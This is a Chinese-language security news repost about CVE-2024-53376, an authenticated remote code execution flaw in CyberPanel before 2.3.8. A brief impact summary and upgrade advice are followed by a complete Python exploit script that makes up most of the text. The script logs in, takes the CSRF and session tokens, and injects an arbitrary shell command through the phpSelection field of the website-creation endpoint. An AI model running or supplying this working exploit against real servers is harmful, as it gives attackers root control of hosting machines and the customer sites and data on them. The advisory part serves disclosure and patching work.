安全研究人员 Thanatos 在 CyberPanel 2.3.7 版本上测试了该漏洞,证明它能够在系统的任何地方执行命令,以 root 权限写入文件。如果可以访问 CyberPanel 的安装文件夹,攻击者就可以进一步提取敏感数据,从而加剧漏洞的严重性。
GitHub 上发布了CVE-2024-53376 的PoC。
CVE-2024-53376 的影响非常严重。成功利用该漏洞可能导致
-
**root权限**:能够以root权限执行命令,让攻击者完全控制受影响的设备。
-
**数据外泄**:如果可以访问 CyberPanel 安装文件夹,敏感数据可直接通过web面板提取。
-
**基础设施受损**:运行易受攻击的 CyberPanel 版本的虚拟主机服务器可能成为进一步攻击的通道,危及托管网站和客户数据。
CyberPanel 已在 2.3.8 版本中解决了这一漏洞。强烈建议所有用户立即将其安装升级到该版本或更高版本。
poc:
https://github.com/ThottySploity/CVE-2024-53376
#!/usr/bin/python3 # CVE-2024-53376 # Exploit Title: CyberPanel - Authenticated Remote Code Execution (RCE) # Exploit Author: Ryan Putman # Technical Details: https://github.com/ThottySploity/CVE-2024-53376 # Date: 2024-12-15 # Vendor Homepage: https://cyberpanel.net # Tested On: Cyberpanel < 2.3.8 # Vulnerability Description: # Command injection vulnerability in the submitWebsiteCreation endpoint import argparse, requests, json from requests.packages.urllib3.exceptions import InsecureRequestWarning # Disabling the SSL errors (since CyberPanel runs on a self signed cert) requests.packages.urllib3.disable_warnings(InsecureRequestWarning) arg_parser = argparse.ArgumentParser() arg_parser.add_argument('-t', metavar='target', help='ip address or domain of Cyberpanel', required=True) arg_parser.add_argument('-u', metavar='username', required=True) arg_parser.add_argument('-p', metavar='password', required=True) arg_parser.add_argument('-c', metavar='cmd', default='id > /tmp/rce #', help='command to execute') args = arg_parser.parse_args() # Obtaining the CSRF token used for authentication csrf_token = requests.get(args.t, verify=False).headers.get('Set-Cookie').split(';')[0] if len(csrf_token) > 0: print(f"[+] Obtained the following CSRFTOKEN: {csrf_token}") payload = { "username": args.u, "password": args.p, "languageSelection": "english", } headers = { 'Cookie': csrf_token, 'Accept': 'application/json', 'X-Csrftoken': csrf_token.replace('csrftoken=', ''), 'Origin': 'https://localhost:8090', 'Referer': 'https://localhost:8090/', 'Connection': 'close' } # Obtaining the sessionId used for authorization. sessionId = requests.post( "{}/verifyLogin".format(args.t), headers=headers, data=json.dumps(payload), verify=False, ).headers.get('Set-Cookie').split(';')[1].replace(" Path=/, ", "") if len(sessionId) > 0: print(f"[+] Obtained the following sessionId: {sessionId}") exploitHeaders = { 'Cookie': f'{csrf_token}; django_language=en; {sessionId}', 'Accept': 'application/json', 'X-Csrftoken': csrf_token.replace('csrftoken=', ''), 'Origin': 'https://localhost:8090', 'Referer': 'https://localhost:8090/', 'Connection': 'close' } exploitPayload = { "package": "Default", "domainName": "cyberpanel.net", "adminEmail": "[email protected]", "phpSelection": f"PHP 8.0'; {args.c}; #", "ssl":0, "websiteOwner":"admin", "dkimCheck":0, "openBasedir":0, "mailDomain":0, "apacheBackend":0, } # Sending the exploit to the vulnerable endpoint exploitRequest = requests.options(f"{args.t}/websites/submitWebsiteCreation", headers=exploitHeaders, data=json.dumps(exploitPayload), verify=False) if exploitRequest.status_code == 200: print("[+] Exploit succeeded") print(f"[+] Executed: {args.c}")
原文始发于微信公众号(棉花糖fans):cve-2024-53376:CyberPanel RCE 已发布PoC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论